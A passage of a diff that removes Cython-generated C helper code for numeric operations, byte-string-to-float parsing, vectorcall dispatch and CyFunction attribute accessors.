PyNumber_InPlaceAdd : PyNumber_Add)(op1, op2); -} -#endif - -/* py_abs */ -#if CYTHON_USE_PYLONG_INTERNALS -static PyObject *__Pyx_PyLong_AbsNeg(PyObject *n) { -#if PY_VERSION_HEX >= 0x030C00A7 - if (likely(__Pyx_PyLong_IsCompact(n))) { - return PyLong_FromSize_t(__Pyx_PyLong_CompactValueUnsigned(n)); - } -#else - if (likely(Py_SIZE(n) == -1)) { - return PyLong_FromUnsignedLong(__Pyx_PyLong_Digits(n)[0]); - } -#endif -#if CYTHON_COMPILING_IN_CPYTHON - { - PyObject *copy = _PyLong_Copy((PyLongObject*)n); - if (likely(copy)) { - #if PY_VERSION_HEX >= 0x030C00A7 - ((PyLongObject*)copy)->long_value.lv_tag = ((PyLongObject*)copy)->long_value.lv_tag & ~_PyLong_SIGN_MASK; - #else - __Pyx_SET_SIZE(copy, -Py_SIZE(copy)); - #endif - } - return copy; - } -#else - return PyNumber_Negative(n); -#endif -} -#endif - -/* PyFloatBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyFloat_TrueDivideObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check) { - const double b = floatval; - double a, result; - CYTHON_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - if (likely(PyFloat_CheckExact(op1))) { -#if CYTHON_COMPILING_IN_LIMITED_API - a = __pyx_PyFloat_AsDouble(op1); -#else - a = PyFloat_AS_DOUBLE(op1); -#endif - - } else - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - a = (double) PyInt_AS_LONG(op1); - - } else - #endif - if (likely(PyLong_CheckExact(op1))) { - #if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsZero(op1)) { - a = 0.0; - - } else if (__Pyx_PyLong_IsCompact(op1)) { - a = (double) __Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - case 2: - if (8 * sizeof(unsigned long) > 2 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (1 * PyLong_SHIFT < 53))) { - a = (double) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if 
((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -2) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -3: - case 3: - if (8 * sizeof(unsigned long) > 3 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53))) { - a = (double) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -3) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -4: - case 4: - if (8 * sizeof(unsigned long) > 4 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53))) { - a = (double) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (4 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -4) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - default: - #endif - a = PyLong_AsDouble(op1); - if (unlikely(a == -1.0 && PyErr_Occurred())) return NULL; - #if CYTHON_USE_PYLONG_INTERNALS - } - } - #endif - } else { - return (inplace ? 
PyNumber_InPlaceTrueDivide : PyNumber_TrueDivide)(op1, op2); - } - PyFPE_START_PROTECT("divide", return NULL) - result = a / b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); -} -#endif - -/* pybytes_as_double */ -static double __Pyx_SlowPyString_AsDouble(PyObject *obj) { - PyObject *float_value; -#if PY_MAJOR_VERSION >= 3 - float_value = PyFloat_FromString(obj); -#else - float_value = PyFloat_FromString(obj, 0); -#endif - if (likely(float_value)) { - double value = PyFloat_AS_DOUBLE(float_value); - Py_DECREF(float_value); - return value; - } - return (double)-1; -} -static const char* __Pyx__PyBytes_AsDouble_Copy(const char* start, char* buffer, Py_ssize_t length) { - int last_was_punctuation = 1; - Py_ssize_t i; - for (i=0; i < length; i++) { - char chr = start[i]; - int is_punctuation = (chr == '_') | (chr == '.') | (chr == 'e') | (chr == 'E'); - *buffer = chr; - buffer += (chr != '_'); - if (unlikely(last_was_punctuation & is_punctuation)) goto parse_failure; - last_was_punctuation = is_punctuation; - } - if (unlikely(last_was_punctuation)) goto parse_failure; - *buffer = '\0'; - return buffer; -parse_failure: - return NULL; -} -static double __Pyx__PyBytes_AsDouble_inf_nan(const char* start, Py_ssize_t length) { - int matches = 1; - char sign = start[0]; - int is_signed = (sign == '+') | (sign == '-'); - start += is_signed; - length -= is_signed; - switch (start[0]) { - #ifdef Py_NAN - case 'n': - case 'N': - if (unlikely(length != 3)) goto parse_failure; - matches &= (start[1] == 'a' || start[1] == 'A'); - matches &= (start[2] == 'n' || start[2] == 'N'); - if (unlikely(!matches)) goto parse_failure; - return (sign == '-') ? -Py_NAN : Py_NAN; - #endif - case 'i': - case 'I': - if (unlikely(length < 3)) goto parse_failure; - matches &= (start[1] == 'n' || start[1] == 'N'); - matches &= (start[2] == 'f' || start[2] == 'F'); - if (likely(length == 3 && matches)) - return (sign == '-') ? 
-Py_HUGE_VAL : Py_HUGE_VAL; - if (unlikely(length != 8)) goto parse_failure; - matches &= (start[3] == 'i' || start[3] == 'I'); - matches &= (start[4] == 'n' || start[4] == 'N'); - matches &= (start[5] == 'i' || start[5] == 'I'); - matches &= (start[6] == 't' || start[6] == 'T'); - matches &= (start[7] == 'y' || start[7] == 'Y'); - if (unlikely(!matches)) goto parse_failure; - return (sign == '-') ? -Py_HUGE_VAL : Py_HUGE_VAL; - case '.': case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': - break; - default: - goto parse_failure; - } - return 0.0; -parse_failure: - return -1.0; -} -static CYTHON_INLINE int __Pyx__PyBytes_AsDouble_IsSpace(char ch) { - return (ch == 0x20) | !((ch < 0x9) | (ch > 0xd)); -} -CYTHON_UNUSED static double __Pyx__PyBytes_AsDouble(PyObject *obj, const char* start, Py_ssize_t length) { - double value; - Py_ssize_t i, digits; - const char *last = start + length; - char *end; - while (__Pyx__PyBytes_AsDouble_IsSpace(*start)) - start++; - while (start < last - 1 && __Pyx__PyBytes_AsDouble_IsSpace(last[-1])) - last--; - length = last - start; - if (unlikely(length <= 0)) goto fallback; - value = __Pyx__PyBytes_AsDouble_inf_nan(start, length); - if (unlikely(value == -1.0)) goto fallback; - if (value != 0.0) return value; - digits = 0; - for (i=0; i < length; digits += start[i++] != '_'); - if (likely(digits == length)) { - value = PyOS_string_to_double(start, &end, NULL); - } else if (digits < 40) { - char number[40]; - last = __Pyx__PyBytes_AsDouble_Copy(start, number, length); - if (unlikely(!last)) goto fallback; - value = PyOS_string_to_double(number, &end, NULL); - } else { - char *number = (char*) PyMem_Malloc((digits + 1) * sizeof(char)); - if (unlikely(!number)) goto fallback; - last = __Pyx__PyBytes_AsDouble_Copy(start, number, length); - if (unlikely(!last)) { - PyMem_Free(number); - goto fallback; - } - value = PyOS_string_to_double(number, &end, NULL); - PyMem_Free(number); - } - if 
(likely(end == last) || (value == (double)-1 && PyErr_Occurred())) { - return value; - } -fallback: - return __Pyx_SlowPyString_AsDouble(obj); -} - -/* pynumber_float */ -static CYTHON_INLINE PyObject* __Pyx__PyNumber_Float(PyObject* obj) { - double val; - if (PyLong_CheckExact(obj)) { -#if CYTHON_USE_PYLONG_INTERNALS - if (likely(__Pyx_PyLong_IsCompact(obj))) { - val = (double) __Pyx_PyLong_CompactValue(obj); - goto no_error; - } -#endif - val = PyLong_AsDouble(obj); - } else if (PyUnicode_CheckExact(obj)) { - val = __Pyx_PyUnicode_AsDouble(obj); - } else if (PyBytes_CheckExact(obj)) { - val = __Pyx_PyBytes_AsDouble(obj); - } else if (PyByteArray_CheckExact(obj)) { - val = __Pyx_PyByteArray_AsDouble(obj); - } else { - return PyNumber_Float(obj); - } - if (unlikely(val == -1 && PyErr_Occurred())) { - return NULL; - } -#if CYTHON_USE_PYLONG_INTERNALS -no_error: -#endif - return PyFloat_FromDouble(val); -} - -/* PyFloatBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static int __Pyx_PyFloat_BoolEqObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check) { - const double b = floatval; - double a; - CYTHON_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - if (op1 == op2) { - return 1; - } - if (likely(PyFloat_CheckExact(op1))) { -#if CYTHON_COMPILING_IN_LIMITED_API - a = __pyx_PyFloat_AsDouble(op1); -#else - a = PyFloat_AS_DOUBLE(op1); -#endif - - } else - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - a = (double) PyInt_AS_LONG(op1); - - } else - #endif - if (likely(PyLong_CheckExact(op1))) { - #if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsZero(op1)) { - a = 0.0; - - } else if (__Pyx_PyLong_IsCompact(op1)) { - a = (double) __Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - case 2: - if (8 * sizeof(unsigned long) > 2 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (1 
* PyLong_SHIFT < 53))) { - a = (double) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -2) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -3: - case 3: - if (8 * sizeof(unsigned long) > 3 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53))) { - a = (double) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -3) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -4: - case 4: - if (8 * sizeof(unsigned long) > 4 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53))) { - a = (double) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (4 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -4) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - default: - #endif - return __Pyx_PyObject_IsTrueAndDecref( - PyFloat_Type.tp_richcompare(op2, op1, Py_EQ)); - #if CYTHON_USE_PYLONG_INTERNALS - } - } - #endif - } else { - return __Pyx_PyObject_IsTrueAndDecref( - PyObject_RichCompare(op1, op2, Py_EQ)); - } - if (a == b) { - return 1; - } else { - return 0; - } -} -#endif - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_SubtractCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op2))) { - const long a = intval; - long x; - long b = 
PyInt_AS_LONG(op2); - - x = (long)((unsigned long)a - (unsigned long)b); - if (likely((x^a) >= 0 || (x^~b) >= 0)) - return PyInt_FromLong(x); - return PyLong_Type.tp_as_number->nb_subtract(op1, op2); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op2))) { - const long a = intval; - long b, x; -#ifdef HAVE_LONG_LONG - const PY_LONG_LONG lla = intval; - PY_LONG_LONG llb, llx; -#endif - if (unlikely(__Pyx_PyLong_IsZero(op2))) { - return __Pyx_NewRef(op1); - } - if (likely(__Pyx_PyLong_IsCompact(op2))) { - b = __Pyx_PyLong_CompactValue(op2); - } else { - const digit* digits = __Pyx_PyLong_Digits(op2); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op2); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - b = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - llb = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - b = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - llb = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - b = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - llb = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned 
PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - b = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - llb = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - b = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - llb = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - b = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - llb = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_subtract(op1, op2); - } - } - x = a - b; - return PyLong_FromLong(x); -#ifdef HAVE_LONG_LONG - long_long: - llx = 
lla - llb; - return PyLong_FromLongLong(llx); -#endif - - - } - #endif - if (PyFloat_CheckExact(op2)) { - const long a = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double b = __pyx_PyFloat_AsDouble(op2); -#else - double b = PyFloat_AS_DOUBLE(op2); -#endif - double result; - - PyFPE_START_PROTECT("subtract", return NULL) - result = ((double)a) - (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? PyNumber_InPlaceSubtract : PyNumber_Subtract)(op1, op2); -} -#endif - -/* RaiseClosureNameError */ -static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname) { - PyErr_Format(PyExc_NameError, "free variable '%s' referenced before assignment in enclosing scope", varname); -} - -/* PyVectorcallFastCallDict */ -#if CYTHON_METH_FASTCALL -static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) -{ - PyObject *res = NULL; - PyObject *kwnames; - PyObject **newargs; - PyObject **kwvalues; - Py_ssize_t i, pos; - size_t j; - PyObject *key, *value; - unsigned long keys_are_strings; - Py_ssize_t nkw = PyDict_GET_SIZE(kw); - newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); - if (unlikely(newargs == NULL)) { - PyErr_NoMemory(); - return NULL; - } - for (j = 0; j < nargs; j++) newargs[j] = args[j]; - kwnames = PyTuple_New(nkw); - if (unlikely(kwnames == NULL)) { - PyMem_Free(newargs); - return NULL; - } - kwvalues = newargs + nargs; - pos = i = 0; - keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; - while (PyDict_Next(kw, &pos, &key, &value)) { - keys_are_strings &= Py_TYPE(key)->tp_flags; - Py_INCREF(key); - Py_INCREF(value); - PyTuple_SET_ITEM(kwnames, i, key); - kwvalues[i] = value; - i++; - } - if (unlikely(!keys_are_strings)) { - PyErr_SetString(PyExc_TypeError, "keywords must be strings"); - goto cleanup; - } - res = vc(func, newargs, nargs, kwnames); -cleanup: - Py_DECREF(kwnames); - for (i = 0; i < 
nkw; i++) - Py_DECREF(kwvalues[i]); - PyMem_Free(newargs); - return res; -} -static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) -{ - if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { - return vc(func, args, nargs, NULL); - } - return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); -} -#endif - -/* CythonFunctionShared */ -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_INLINE int __Pyx__IsSameCyOrCFunction(PyObject *func, void *cfunc) { - if (__Pyx_CyFunction_Check(func)) { - return PyCFunction_GetFunction(((__pyx_CyFunctionObject*)func)->func) == (PyCFunction) cfunc; - } else if (PyCFunction_Check(func)) { - return PyCFunction_GetFunction(func) == (PyCFunction) cfunc; - } - return 0; -} -#else -static CYTHON_INLINE int __Pyx__IsSameCyOrCFunction(PyObject *func, void *cfunc) { - return __Pyx_CyOrPyCFunction_Check(func) && __Pyx_CyOrPyCFunction_GET_FUNCTION(func) == (PyCFunction) cfunc; -} -#endif -static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - __Pyx_Py_XDECREF_SET( - __Pyx_CyFunction_GetClassObj(f), - ((classobj) ? __Pyx_NewRef(classobj) : NULL)); -#else - __Pyx_Py_XDECREF_SET( - ((PyCMethodObject *) (f))->mm_class, - (PyTypeObject*)((classobj) ? 
__Pyx_NewRef(classobj) : NULL)); -#endif -} -static PyObject * -__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) -{ - CYTHON_UNUSED_VAR(closure); - if (unlikely(op->func_doc == NULL)) { -#if CYTHON_COMPILING_IN_LIMITED_API - op->func_doc = PyObject_GetAttrString(op->func, "__doc__"); - if (unlikely(!op->func_doc)) return NULL; -#else - if (((PyCFunctionObject*)op)->m_ml->ml_doc) { -#if PY_MAJOR_VERSION >= 3 - op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); -#else - op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); -#endif - if (unlikely(op->func_doc == NULL)) - return NULL; - } else { - Py_INCREF(Py_None); - return Py_None; - } -#endif - } - Py_INCREF(op->func_doc); - return op->func_doc; -} -static int -__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (value == NULL) { - value = Py_None; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_doc, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (unlikely(op->func_name == NULL)) { -#if CYTHON_COMPILING_IN_LIMITED_API - op->func_name = PyObject_GetAttrString(op->func, "__name__"); -#elif PY_MAJOR_VERSION >= 3 - op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); -#else - op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); -#endif - if (unlikely(op->func_name == NULL)) - return NULL; - } - Py_INCREF(op->func_name); - return op->func_name; -} -static int -__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__name__ must be set to a string object"); 
- return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_name, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - Py_INCREF(op->func_qualname); - return op->func_qualname; -} -static int -__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__qualname__ must be set to a string object"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_qualname, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (unlikely(op->func_dict == NULL)) { - op->func_dict = PyDict_New(); - if (unlikely(op->func_dict == NULL)) - return NULL; - } - Py_INCREF(op->func_dict); - return op->func_dict; -} -static int -__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (unlikely(value == NULL)) { - PyErr_SetString(PyExc_TypeError, - "function's dictionary may not be deleted"); - return -1; - } - if (unlikely(!PyDict_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "setting function's dictionary to a non-dict"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_dict, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - Py_INCREF(op->func_globals); - return op->func_globals; -} -static PyObject * -__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(op); - CYTHON_UNUSED_VAR(context); - Py_INCREF(Py_None); - return Py_None; -} -static PyObject * 
-__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) -{ - PyObject* result = (op->func_code) ? op->func_code : Py_None; - CYTHON_UNUSED_VAR(context); - Py_INCREF(result); - return result; -} -static int -__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { - int result = 0; - PyObject *res = op->defaults_getter((PyObject *) op); - if (unlikely(!res)) - return -1; - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - op->defaults_tuple = PyTuple_GET_ITEM(res, 0); - Py_INCREF(op->defaults_tuple); - op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); - Py_INCREF(op->defaults_kwdict); - #else - op->defaults_tuple = __Pyx_PySequence_ITEM(res, 0); - if (unlikely(!op->defaults_tuple)) result = -1; - else { - op->defaults_kwdict = __Pyx_PySequence_ITEM(res, 1); - if (unlikely(!op->defaults_kwdict)) result = -1; - } - #endif - Py_DECREF(res); - return result; -} -static int -__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - CYTHON_UNUSED_VAR(context); - if (!value) { - value = Py_None; - } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "__defaults__ must be set to a tuple object"); - return -1; - } - PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " - "currently affect the values used in function calls", 1); - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { - PyObject* result = op->defaults_tuple; - CYTHON_UNUSED_VAR(context); - if (unlikely(!result)) { - if (op->defaults_getter) { - if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; - result = op->defaults_tuple; - } else { - result = Py_None; - } - } - Py_INCREF(result); - return result; -} -static int -__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - 
CYTHON_UNUSED_VAR(context); - if (!value) { - value = Py_None; - } else if (unlikely(value != Py_None && !PyDict_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "__kwdefaults__ must be set to a dict object"); - return -1; - } - PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " - "currently affect the values used in function calls", 1); - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { - PyObject* result = op->defaults_kwdict; - CYTHON_UNUSED_VAR(context); - if (unlikely(!result)) { - if (op->defaults_getter) { - if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; - result = op->defaults_kwdict; - } else { - result = Py_None; - } - } - Py_INCREF(result); - return result; -} -static int -__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - CYTHON_UNUSED_VAR(context); - if (!value || value == Py_None) { - value = NULL; - } else if (unlikely(!PyDict_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "__annotations__ must be set to a dict object"); - return -1; - } - Py_XINCREF(value); - __Pyx_Py_XDECREF_SET(op->func_annotations, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { - PyObject* result = op->func_annotations; - CYTHON_UNUSED_VAR(context); - if (unlikely(!result)) { - result = PyDict_New(); - if (unlikely(!result)) return NULL; - op->func_annotations = result; - } - Py_INCREF(result); - return result; -} -static PyObject * -__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { - int is_coroutine; - CYTHON_UNUSED_VAR(context); - if (op->func_is_coroutine) { - return __Pyx_NewRef(op->func_is_coroutine); - } - is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; -#if PY_VERSION_HEX >= 0x03050000 - if (is_coroutine) { - PyObject 
*module, *fromlist, *marker = __pyx_n_s_is_coroutine; - fromlist = PyList_New(1); - if (unlikely(!fromlist)) return NULL; - Py_INCREF(marker); -#if CYTHON_ASSUME_SAFE_MACROS - PyList_SET_ITEM(fromlist, 0, marker); -#else - if (unlikely(PyList_SetItem(fromlist, 0, marker) < 0)) { - Py_DECREF(marker); - Py_DECREF(fromlist); - return NULL; - } -#endif - module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); - Py_DECREF(fromlist); - if (unlikely(!module)) goto ignore; - op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); - Py_DECREF(module); - if (likely(op->func_is_coroutine)) { - return __Pyx_NewRef(op->func_is_coroutine); - } -ignore: - PyErr_Clear(); - } -#endif - op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); - return __Pyx_NewRef(op->func_is_coroutine); -} -#if CYTHON_COMPILING_IN_LIMITED_API -static PyObject * -__Pyx_CyFunction_get_module(__pyx_CyFunctionObject *op, void 